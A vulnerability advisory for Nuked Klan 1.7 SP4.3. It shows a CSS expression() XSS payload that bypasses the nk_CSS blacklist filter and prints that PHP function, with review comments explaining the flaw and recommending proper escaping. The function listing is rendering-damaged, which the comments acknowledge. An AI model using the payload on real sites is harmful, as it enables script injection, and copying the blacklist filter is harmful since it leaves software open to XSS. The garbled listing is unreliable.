Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

2006.09.02
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

// *- BEGIN -* // By Blwood // http://blwood.net <http://blwood.net/>
// We can bypass the anti-XSS function called nk_CSS (nuked.php) like this:
// <b id="blwood" style="width:expression(alert(' http://www.blwood.net')) <http://www.blwood.net%27%29%29/>"></b>
// Here is the function :
//
// NOTE(review): nk_CSS is a keyword blacklist, not a parser: it walks a fixed
// list of tokens (MIME headers, PHP tags, script/event-handler names, DOM
// words) and rewrites each occurrence with eregi_replace, i.e. a
// case-insensitive POSIX regex replace. Everything not on the list passes
// through untouched. That is why the payload above works: a `style` attribute
// carrying a CSS `expression(...)` contains none of the listed words.
//
// NOTE(review): as printed on this page most replacement strings are identical
// to their pattern, which would make the calls no-ops. The stray `;` in
// "conten ;t-dispositio n:" and the literal "&# 101;" fragment suggest the
// shipped code used HTML numeric character references (e.g. an entity for one
// letter of each keyword) and the page rendering decoded them. Treat this
// listing as approximate — confirm against the nuked.php actually deployed.
//
// NOTE(review): the first argument of eregi_replace is a regex, not a literal.
// In "<?" and "?>" the `?` is a quantifier, so as printed those two patterns do
// not match the literal PHP tags. eregi_replace itself was deprecated in
// PHP 5.3 and removed in PHP 7.0; on a current runtime this function fails
// with an undefined-function error.
//
// Defensive fix (rather than extending the blacklist): escape per output
// context — htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') where
// no markup is intended — or run user-supplied HTML through an allowlist-based
// sanitiser that drops unknown tags and attributes (including `style`).
function nk_CSS($str) {
    // Loose comparison: null or "" skip the filter and are returned as-is.
    if ($str != "") {
        // MIME-header tokens (header-injection guard for mail/upload contexts).
        $str = eregi_replace("content-disposition:","conten ;t-dispositio n:",$str);
        $str = eregi_replace("content-type:","content -type:",$str);
        $str = eregi_replace("content-transfer-encoding:","conte ;nt-transfer-&# 101;ncoding:",$str);
        // PHP-related tokens.
        $str = eregi_replace("include","include",$str );
        $str = eregi_replace("<?","<?",$str);
        $str = eregi_replace("<?php","<?php",$str);
        $str = eregi_replace("?>","?>",$str);
        // Script-related tokens.
        $str = eregi_replace("script","script",$str);
        $str = eregi_replace("eval","eval",$str);
        $str = eregi_replace("javascript","javascri ;pt",$str);
        $str = eregi_replace("embed","embed",$str);
        $str = eregi_replace("iframe","iframe",$str);
        $str = eregi_replace("refresh", "refresh", $str);
        // Inline event-handler attribute names. The list is fixed; any handler
        // or attribute not named here (e.g. `style`) is not touched.
        $str = eregi_replace("onload", "onload", $str);
        $str = eregi_replace("onstart", "onstart", $str);
        $str = eregi_replace("onerror", "onerror", $str);
        $str = eregi_replace("onabort", "onabort", $str);
        $str = eregi_replace("onblur", "onblur", $str);
        $str = eregi_replace("onchange", "onchange", $str);
        $str = eregi_replace("onclick", "onclick", $str);
        $str = eregi_replace("ondblclick", "ondblclick", $str);
        $str = eregi_replace("onfocus", "onfocus", $str);
        $str = eregi_replace("onkeydown", "onkeydown", $str);
        $str = eregi_replace("onkeypress", "onkeypress", $str);
        $str = eregi_replace("onkeyup", "onkeyup", $str);
        $str = eregi_replace("onmousedown", "onmousedown", $str);
        $str = eregi_replace("onmousemove", "onmousemove", $str);
        $str = eregi_replace("onmouseover", "onmouseover", $str);
        $str = eregi_replace("onmouseout", "onmouseout", $str);
        $str = eregi_replace("onmouseup", "onmouseup", $str);
        $str = eregi_replace("onreset", "onreset", $str);
        $str = eregi_replace("onselect", "onselect", $str);
        $str = eregi_replace("onsubmit", "onsubmit", $str);
        $str = eregi_replace("onunload", "onunload", $str);
        // DOM / URL tokens.
        $str = eregi_replace("document", "document", $str);
        $str = eregi_replace("cookie", "cookie", $str);
        $str = eregi_replace("vbscript", "vbscript", $str);
        $str = eregi_replace("location", "location", $str);
        $str = eregi_replace("object", "object", $str);
        $str = eregi_replace("vbs", "vbs", $str);
        $str = eregi_replace("href", "href", $str);
        $str = eregi_replace("src", "src", $str);
    }
    return($str);
}
// *- END -*

